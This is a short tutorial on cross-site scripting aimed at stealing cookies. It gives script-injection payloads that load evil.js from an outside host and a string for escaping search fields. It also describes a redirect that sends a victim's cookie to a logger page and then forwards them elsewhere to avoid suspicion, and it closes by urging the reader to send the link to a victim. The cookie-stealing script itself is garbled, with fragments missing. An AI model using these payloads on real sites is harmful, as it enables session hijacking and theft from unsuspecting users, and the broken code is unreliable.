Here is where I will discuss some different syntaxes of XSS and how to steal cookies. I will also explain the idea of how the XSS syntaxes work.
<script src=http://site.com/evil.js></script>
'"/></><script src=http://site.com/evil.js></script>
This is what I mostly use to escape fields on the website. Let's say that I search for "test" and the next page shows the word "test" in the search field again; I will try to escape it with this code.
<img src=xss.png
<script> document.location
siteb.com";</script>
This script will redirect the webpage to http://sitea.com/log.php?c=[THEIR COOKIE]&redirect=http://siteb.com
The GET variable c contains the user's cookie from the following page. The redirect part is just another GET var that will redirect them away from the logger, to another website, so that they do not notice anything TOO strange. The best way to avoid suspicion is to redirect them to the same site, just a different page.
After that, all that is pretty much left to do is send a link containing the URL with the XSS vulnerability in it to your victim and let him or her click it, while you wait for your cookies.